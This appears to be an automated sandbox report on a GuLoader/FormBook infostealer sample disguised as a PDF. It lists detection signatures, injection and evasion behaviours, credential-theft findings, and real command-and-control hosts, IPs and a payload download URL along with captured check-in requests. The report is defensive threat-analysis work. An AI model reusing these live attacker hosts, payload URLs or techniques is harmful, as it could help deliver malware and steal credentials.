Windows Analysis Report
S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe

Overview

General Information

Sample name: S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe
renamed because original name is a hash value
Original sample name: SPAR No.112024-pdf.bat.exe
Analysis ID: 1562046
MD5: f33b6e1067bf27d4bea237206532881e
SHA1: 5602bb70d47fb5f8061688b62b6f9b3bafd1a4bc
SHA256: 2ab9083b17140ee82b2d96fceecfc3ad8c286b320222b074719fe7a1852ab91a
Tags: batexegeoGuLoaderTURuser-abuse_ch
Infos:

Detection

FormBook, GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
Yara detected GuLoader
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

AV Detection
barindex
Multi AV Scanner detection for submitted file
Source: S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Virustotal: Detection: 15% Perma Link
Yara detected FormBook
Source: Yara match File source: 00000007.00000002.2937577500.0000000000ED0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2937146077.00000000007E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2935957213.0000000000640000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2937634910.0000000000F20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2633149796.00000000329F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.2937326522.00000000025E0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2633741377.0000000033050000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
Uses 32bit PE files
Source: S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: sdchange.pdbGCTL source: S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe, 00000004.00000003.2567118439.0000000002DB7000.00000004.00000020.00020000.00000000.sdmp, S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe, 00000004.00000003.2567064883.0000000002DAE000.00000004.00000020.00020000.00000000.sdmp, cXGDMXIloFhOE.exe, 00000006.00000002.2936496818.0000000000728000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mshtml.pdb source: S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe, 00000004.00000001.2268563953.0000000000649000.00000008.00000001.01000000.00000009.sdmp
Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: cXGDMXIloFhOE.exe, 00000006.00000002.2936926532.0000000000EEE000.00000002.00000001.01000000.0000000A.sdmp, cXGDMXIloFhOE.exe, 00000008.00000000.2687039028.0000000000EEE000.00000002.00000001.01000000.0000000A.sdmp
Source: Binary string: wntdll.pdbUGP source: S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe, 00000004.00000003.2506460914.0000000032B57000.00000004.00000020.00020000.00000000.sdmp, S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe, 00000004.00000002.2633223888.0000000032D00000.00000040.00001000.00020000.00000000.sdmp, S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe, 00000004.00000003.2504045336.00000000329A4000.00000004.00000020.00020000.00000000.sdmp, S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe, 00000004.00000002.2633223888.0000000032E9E000.00000040.00001000.00020000.00000000.sdmp, sdchange.exe, 00000007.00000002.2938037138.0000000004710000.00000040.00001000.00020000.00000000.sdmp, sdchange.exe, 00000007.00000002.2938037138.00000000048AE000.00000040.00001000.00020000.00000000.sdmp, sdchange.exe, 00000007.00000003.2611022611.000000000455B000.00000004.00000020.00020000.00000000.sdmp, sdchange.exe, 00000007.00000003.2608657007.00000000043AC000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe, S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe, 00000004.00000003.2506460914.0000000032B57000.00000004.00000020.00020000.00000000.sdmp, S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe, 00000004.00000002.2633223888.0000000032D00000.00000040.00001000.00020000.00000000.sdmp, S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe, 00000004.00000003.2504045336.00000000329A4000.00000004.00000020.00020000.00000000.sdmp, S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe, 00000004.00000002.2633223888.0000000032E9E000.00000040.00001000.00020000.00000000.sdmp, sdchange.exe, 00000007.00000002.2938037138.0000000004710000.00000040.00001000.00020000.00000000.sdmp, sdchange.exe, 00000007.00000002.2938037138.00000000048AE000.00000040.00001000.00020000.00000000.sdmp, sdchange.exe, 00000007.00000003.2611022611.000000000455B000.00000004.00000020.00020000.00000000.sdmp, sdchange.exe, 00000007.00000003.2608657007.00000000043AC000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mshtml.pdbUGP source: S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe, 00000004.00000001.2268563953.0000000000649000.00000008.00000001.01000000.00000009.sdmp
Source: Binary string: sdchange.pdb source: S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe, 00000004.00000003.2567118439.0000000002DB7000.00000004.00000020.00020000.00000000.sdmp, S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe, 00000004.00000003.2567064883.0000000002DAE000.00000004.00000020.00020000.00000000.sdmp, cXGDMXIloFhOE.exe, 00000006.00000002.2936496818.0000000000728000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 0_2_004065C7 FindFirstFileW,FindClose, 0_2_004065C7
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 0_2_00405996 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 0_2_00405996
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 0_2_00402868 FindFirstFileW, 0_2_00402868

Networking
barindex
Suricata IDS alerts for network traffic
Source: Network traffic Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49839 -> 195.110.124.133:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49875 -> 104.21.95.160:80
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 195.110.124.133 195.110.124.133
Source: Joe Sandbox View IP Address: 103.83.194.50 103.83.194.50
Source: Joe Sandbox View IP Address: 103.83.194.50 103.83.194.50
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: REGISTER-ASIT REGISTER-ASIT
Source: Joe Sandbox View ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Suricata IDS alerts with low severity for network traffic
Source: Network traffic Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49743 -> 103.83.194.50:80
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic HTTP traffic detected: GET /tk.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: enechado.ru.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /vlg0/?s42t_Nbx=qomJeF/TtZ0QUZ/lu9XGw5rEDKlC0VH3n7TxRqREffWgONqaapTJswa8a+ti36YSjfwaEcz7GfWHOzY8D/KxwVpCEXfXsdPRTHALBjA15rmVzjOLWJp7K7s=&F0vD=qVTlJB1hk6Wd HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usHost: www.officinadelpasso.shopConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.2; rv:29.0) Gecko/20100101 Firefox/29.0
Source: global traffic DNS traffic detected: DNS query: enechado.ru.com
Source: global traffic DNS traffic detected: DNS query: www.officinadelpasso.shop
Source: global traffic DNS traffic detected: DNS query: www.vayui.top
Source: unknown HTTP traffic detected: POST /4twy/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: en-usHost: www.vayui.topOrigin: http://www.vayui.topReferer: http://www.vayui.top/4twy/Cache-Control: max-age=0Content-Type: application/x-www-form-urlencodedContent-Length: 205Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.2; rv:29.0) Gecko/20100101 Firefox/29.0Data Raw: 73 34 32 74 5f 4e 62 78 3d 72 44 71 6b 6d 68 44 32 4c 4f 6e 54 78 39 72 38 66 73 62 6d 7a 32 4f 38 69 4d 43 57 46 50 57 4d 78 43 6a 49 6e 6b 36 6d 67 66 6a 48 6c 72 69 50 6d 41 63 33 58 34 73 55 46 69 39 69 48 79 79 67 79 72 4f 45 48 2f 54 4f 58 43 45 4c 41 34 2b 2f 4f 64 58 46 48 64 49 39 6a 53 79 6f 45 79 35 38 62 35 77 75 31 54 57 6d 2f 45 71 53 37 49 4b 63 69 72 54 35 66 57 49 33 75 66 4a 47 4a 43 61 54 39 59 31 6e 68 73 35 6a 46 6f 51 57 34 65 6e 6e 68 62 63 7a 6f 4e 4f 37 78 69 64 6b 73 6e 4e 35 54 48 59 48 68 58 6d 30 4a 39 35 46 73 55 50 67 57 45 45 6d 71 6c 6d 4f 56 49 72 31 64 71 4d 43 32 51 3d 3d Data Ascii: s42t_Nbx=rDqkmhD2LOnTx9r8fsbmz2O8iMCWFPWMxCjInk6mgfjHlriPmAc3X4sUFi9iHyygyrOEH/TOXCELA4+/OdXFHdI9jSyoEy58b5wu1TWm/EqS7IKcirT5fWI3ufJGJCaT9Y1nhs5jFoQW4ennhbczoNO7xidksnN5THYHhXm0J95FsUPgWEEmqlmOVIr1dqMC2Q==
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 25 Nov 2024 06:09:48 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 76 6c 67 30 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /vlg0/ was not found on this server.</p></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 25 Nov 2024 06:10:05 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BEwHlfkuX1XBoKn060kgOYQVkjIkdeCrBYmcS1n4baMNJm3QfEvFO4Yk3k3h8G8sxB4vf29TZj4c%2BmdukNc2eU5n87BwRj2KZtYO9XsDdgIdHL1c0MbRnJDb119sRSYA"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e7f793d6f090cae-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1493&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=712&delivery_rate=0&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 36 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6d(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyr0.a30
Source: S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe, 00000004.00000002.2603801719.0000000002D48000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://enechado.ru.com/tk.bin
Source: S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe, 00000004.00000002.2603801719.0000000002D48000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://enechado.ru.com/tk.binJ
Source: S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe, 00000004.00000001.2268563953.0000000000649000.00000008.00000001.01000000.00000009.sdmp String found in binary or memory: http://www.ftp.ftp://ftp.gopher.
Source: cXGDMXIloFhOE.exe, 00000008.00000002.2937146077.0000000000835000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.vayui.top
Source: cXGDMXIloFhOE.exe, 00000008.00000002.2937146077.0000000000835000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.vayui.top/4twy/
Source: S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe, 00000004.00000001.2268563953.00000000005F2000.00000008.00000001.01000000.00000009.sdmp String found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd
Source: S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe, 00000004.00000001.2268563953.00000000005F2000.00000008.00000001.01000000.00000009.sdmp String found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd
Source: sdchange.exe, 00000007.00000003.2811482528.0000000007778000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: sdchange.exe, 00000007.00000003.2811482528.0000000007778000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: sdchange.exe, 00000007.00000003.2811482528.0000000007778000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: sdchange.exe, 00000007.00000003.2811482528.0000000007778000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: sdchange.exe, 00000007.00000003.2811482528.0000000007778000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: sdchange.exe, 00000007.00000003.2811482528.0000000007778000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: sdchange.exe, 00000007.00000003.2811482528.0000000007778000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe, 00000004.00000001.2268563953.0000000000649000.00000008.00000001.01000000.00000009.sdmp String found in binary or memory: https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214
Source: sdchange.exe, 00000007.00000002.2936326745.00000000008A5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: sdchange.exe, 00000007.00000002.2936326745.00000000008A5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
Source: sdchange.exe, 00000007.00000002.2936326745.00000000008A5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: sdchange.exe, 00000007.00000002.2936326745.00000000008A5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
Source: sdchange.exe, 00000007.00000002.2936326745.00000000008A5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
Source: sdchange.exe, 00000007.00000003.2801057785.000000000775E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
Source: sdchange.exe, 00000007.00000003.2811482528.0000000007778000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/
Source: sdchange.exe, 00000007.00000003.2811482528.0000000007778000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Contains functionality for read data from the clipboard
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 0_2_0040542B GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard, 0_2_0040542B

E-Banking Fraud
barindex
Yara detected FormBook
Source: Yara match File source: 00000007.00000002.2937577500.0000000000ED0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2937146077.00000000007E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2935957213.0000000000640000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2937634910.0000000000F20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2633149796.00000000329F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.2937326522.00000000025E0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2633741377.0000000033050000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Contains functionality to call native functions
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D735C0 NtCreateMutant,LdrInitializeThunk, 4_2_32D735C0
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D72B60 NtClose,LdrInitializeThunk, 4_2_32D72B60
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D72C70 NtFreeVirtualMemory,LdrInitializeThunk, 4_2_32D72C70
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D72DF0 NtQuerySystemInformation,LdrInitializeThunk, 4_2_32D72DF0
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D74340 NtSetContextThread, 4_2_32D74340
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D73090 NtSetValueKey, 4_2_32D73090
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D73010 NtOpenDirectoryObject, 4_2_32D73010
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D74650 NtSuspendThread, 4_2_32D74650
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D72AD0 NtReadFile, 4_2_32D72AD0
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D72AF0 NtWriteFile, 4_2_32D72AF0
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D72AB0 NtWaitForSingleObject, 4_2_32D72AB0
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D72BF0 NtAllocateVirtualMemory, 4_2_32D72BF0
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D72BE0 NtQueryValueKey, 4_2_32D72BE0
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D72B80 NtQueryInformationFile, 4_2_32D72B80
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D72BA0 NtEnumerateValueKey, 4_2_32D72BA0
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D739B0 NtGetContextThread, 4_2_32D739B0
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D72EE0 NtQueueApcThread, 4_2_32D72EE0
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D72E80 NtReadVirtualMemory, 4_2_32D72E80
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D72EA0 NtAdjustPrivilegesToken, 4_2_32D72EA0
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D72E30 NtWriteVirtualMemory, 4_2_32D72E30
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D72FE0 NtCreateFile, 4_2_32D72FE0
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D72F90 NtProtectVirtualMemory, 4_2_32D72F90
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D72FB0 NtResumeThread, 4_2_32D72FB0
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D72FA0 NtQuerySection, 4_2_32D72FA0
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D72F60 NtCreateProcessEx, 4_2_32D72F60
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D72F30 NtCreateSection, 4_2_32D72F30
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D72CC0 NtQueryVirtualMemory, 4_2_32D72CC0
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D72CF0 NtOpenProcess, 4_2_32D72CF0
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D72CA0 NtQueryInformationToken, 4_2_32D72CA0
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D72C60 NtCreateKey, 4_2_32D72C60
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D72C00 NtQueryInformationProcess, 4_2_32D72C00
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D72DD0 NtDelayExecution, 4_2_32D72DD0
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D72DB0 NtEnumerateKey, 4_2_32D72DB0
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D73D70 NtOpenThread, 4_2_32D73D70
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D73D10 NtOpenProcessToken, 4_2_32D73D10
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D72D10 NtMapViewOfSection, 4_2_32D72D10
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D72D00 NtSetInformationFile, 4_2_32D72D00
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D72D30 NtUnmapViewOfSection, 4_2_32D72D30
Contains functionality to shutdown / reboot the system
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 0_2_00403359 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 0_2_00403359
Creates files inside the system directory
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe File created: C:\Windows\resources\0809 Jump to behavior
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe File created: C:\Windows\resources\0809\mysterist.ini Jump to behavior
Detected potential crypto function
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 0_2_00404C68 0_2_00404C68
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 0_2_0040698E 0_2_0040698E
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 0_2_6FBC1B63 0_2_6FBC1B63
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D5B2C0 4_2_32D5B2C0
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D5D2F0 4_2_32D5D2F0
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32DE12ED 4_2_32DE12ED
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D452A0 4_2_32D452A0
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32DE0274 4_2_32DE0274
